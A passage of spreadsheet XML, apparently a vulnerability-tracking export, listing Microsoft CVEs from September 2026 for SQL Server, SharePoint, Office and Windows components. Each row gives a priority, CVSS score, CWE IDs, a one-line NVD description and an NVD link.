      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68828</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69285</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69334</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
